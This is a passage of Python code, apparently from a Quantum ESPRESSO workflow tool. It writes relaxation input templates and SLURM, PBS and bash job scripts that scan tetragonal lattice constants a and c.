os.chdir(directory)
for i_batch_a in range(n_batch_a):
for i_batch_c in range(n_batch_c):
os.system("bash relax-hexagonal-%d-%d.sh" % (i_batch_a, i_batch_c))
os.chdir("../")
for i_batch_a in range(n_batch_a):
for i_batch_c in range(n_batch_c):
server_handle(auto=auto, directory=directory, jobfilebase="relax-hexagonal-%d-%d" % (i_batch_a, i_batch_c), server=self.run_params["server"])
def tetragonal(self, directory="tmp-qe-relax-tetragonal", runopt="gen", auto=0, range_a=[-0.1, 0.101, 0.01], range_c=[-0.1, 0.101, 0.01]):
"""
"""
na = len(np.arange(range_a[0], range_a[1], range_a[2]))
nc = len(np.arange(range_c[0], range_c[1], range_c[2]))
if self.batch_a == None:
# namely all in one batch
self.batch_a = na
else:
pass
if self.batch_c == None:
# namely all in one batch
self.batch_c = nc
else:
pass
if na % self.batch_a == 0:
n_batch_a = int(na / self.batch_a)
else:
n_batch_a = int(na / self.batch_a) + 1
if nc % self.batch_c == 0:
n_batch_c = int(nc / self.batch_c)
else:
n_batch_c = int(nc / self.batch_c) + 1
#
if os.path.exists(directory):
shutil.rmtree(directory)
os.mkdir(directory)
shutil.copyfile(self.arts.xyz.file, os.path.join(directory, os.path.basename(self.arts.xyz.file)))
#all_upfs = [s for s in os.listdir() if s.split(".")[-1] == "UPF"]
all_file = os.listdir()
for element in self.arts.xyz.specie_labels:
for item in all_file:
#if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE):
#if item.split(".")[0].lower() == element.lower() or item.split("_")[0].lower() == element.lower():
if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE) or re.match("(%s)(_*)(upf)" % element, item, re.IGNORECASE):
shutil.copyfile(item, os.path.join(directory, item))
break
self.arts.pseudo.dir = os.path.abspath(directory)
self.control.set_params({"pseudo_dir": os.path.abspath(directory)})
#
os.chdir(directory)
with open("relax.in.template", 'w') as fout:
self.control.to_in(fout)
self.system.to_in(fout)
self.electrons.to_in(fout)
self.ions.to_in(fout)
coordtype = "crystal" # use crystal here so we could only change cell when opt cell
fout.write("ATOMIC_SPECIES\n")
all_file = os.listdir(self.arts.pseudo.dir)
for element in self.arts.xyz.specie_labels:
for item in all_file:
if re.match("(%s)(.*)(upf)" % (element), item, re.IGNORECASE):
fout.write("%s %f %s\n" % (element, base.element[element].mass, item))
break
fout.write("\n")
if coordtype == "angstrom":
fout.write("ATOMIC_POSITIONS angstrom\n")
if self.arts.ifstatic == True:
for atom in self.arts.xyz.atoms:
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (atom.name, atom.x, atom.y, atom.z))
elif self.arts.ifstatic == False:
for atom in self.arts.xyz.atoms:
fout.write("%s\t%.9f\t%.9f\t%.9f" % (atom.name, atom.x, atom.y, atom.z))
for fix in atom.fix:
if fix == True:
fout.write("\t0")
elif fix == False:
fout.write("\t1")
fout.write("\n")
else:
print("===============================================\n")
print("warning: qe.base.arts.to_in():\n")
print("arts.ifstatic could only be True or False\n")
sys.exit(1)
fout.write("\n")
elif coordtype == "crystal":
# crystal namely fractional coordinate can be convert from cartesian coordinates
# the conversion process is like transformation of presentation in quantum mechanics
# the convmat is bulid to do the conversion
#latcell = np.array(self.xyz.cell)
#latcell = latcell.reshape(3, 3)
latcell = np.array(self.arts.xyz.cell)
convmat = np.linalg.inv(latcell.T)
crystal_coord = np.zeros([self.arts.xyz.natom, 3])
for i in range(self.arts.xyz.natom):
crystal_coord[i] = convmat.dot(np.array([self.arts.xyz.atoms[i].x, self.arts.xyz.atoms[i].y, self.arts.xyz.atoms[i].z]))
#
fout.write("ATOMIC_POSITIONS crystal\n")
if self.arts.ifstatic == True:
for k in range(self.arts.xyz.natom):
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (self.arts.xyz.atoms[k].name, crystal_coord[k, 0], crystal_coord[k, 1], crystal_coord[k, 2]))
elif self.arts.ifstatic == False:
for k in range(self.arts.xyz.natom):
fout.write("%s\t%.9f\t%.9f\t%.9f" % (self.arts.xyz.atoms[k].name, crystal_coord[k, 0], crystal_coord[k, 1], crystal_coord[k, 2]))
for fix in self.arts.xyz.atoms[k].fix:
if fix == True:
fout.write("\t0")
elif fix == False:
fout.write("\t1")
fout.write("\n")
else:
print("===============================================\n")
print("warning: qe.base.arts.to_in():\n")
print("arts.ifstatic could only be True or False\n")
sys.exit(1)
fout.write("\n")
# end crystal type ATOMIC_POSITIONS
# writing KPOINTS to the fout
self.arts.write_kpoints(fout)
# =========================
#
# writing forces act on atoms
if self.arts.atomic_forces_status == True:
self.arts.write_atomic_forces(fout)
# =========================
for i_batch_a in range(n_batch_a):
for i_batch_c in range(n_batch_c):
# gen llhpc script
with open("relax-tetragonal-%d-%d.slurm" % (i_batch_a, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#!/bin/bash\n")
fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_c))
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# - range_a[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# - range_c[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_c_end > range_c[1]:
range_c_end = range_c[1]
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
if nc >= 2:
# optimize both a and c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${a}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" yhrun $PMF_PWX < relax-${a}-${c}.in > relax-${a}-${c}.out\n")
fout.write(" done\n")
else:
# only optimize a
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" yhrun $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
else:
# a is not optimized
if nc >= 2:
# only optimize c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${c}.in<<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" yhrun $PMF_PWX < relax-${c}.in > relax-${c}.out\n")
fout.write("done\n")
else:
# neither a or c is optimized
pass
# gen pbs script
with open("relax-tetragonal-%d-%d.pbs" % (i_batch_a, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#PBS -N %s-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_c))
fout.write("#PBS -l nodes=%d:ppn=%d\n" % (self.run_params["nodes"], self.run_params["ppn"]))
if "queue" in self.run_params and self.run_params["queue"] != None:
fout.write("#PBS -q %s\n" %self.run_params["queue"])
fout.write("\n")
fout.write("cd $PBS_O_WORKDIR\n")
fout.write("NP=`cat $PBS_NODEFILE | wc -l`\n")
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# - range_a[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# - range_c[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_c_end > range_c[1]:
range_c_end = range_c[1]
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
if nc >= 2:
# optimize both a and c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${a}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE $PMF_PWX < relax-${a}-${c}.in > relax-${a}-${c}.out\n")
fout.write(" done\n")
else:
# only optimize a
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
else:
# a is not optimized
if nc >= 2:
# only optimize c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${c}.in<<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE $PMF_PWX < relax-${c}.in > relax-${c}.out\n")
fout.write("done\n")
else:
# neither a or c is optimized
pass
# gen local bash script
with open("relax-tetragonal-%d-%d.bash" % (i_batch_a, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# - range_a[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# - range_c[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_c_end > range_c[1]:
range_c_end = range_c[1]
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
if nc >= 2:
# optimize both a and c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${a}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${a}-${c}.in | tee relax-${a}-${c}.out\n" % self.run_params["mpi"])
fout.write(" done\n")
else:
# only optimize a
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${a}.in | tee relax-${a}.out\n" % self.run_params["mpi"])
fout.write("done\n")
else:
# a is not optimized
if nc >= 2:
# only optimize c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${c}.in<<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${c}.in | tee relax-${c}.out\n" % self.run_params["mpi"])
fout.write("done\n")
else:
# neither a or c is optimized
pass
# gen cdcloud script
with open("relax-tetragonal-%d-%d.slurm_cd" % (i_batch_a, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#!/bin/bash\n")
fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_c))
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
fout.write("#\n")
fout.write("export I_MPI_PMI_LIBRARY=/opt/gridview/slurm/lib/libpmi.so\n")
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# - range_a[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
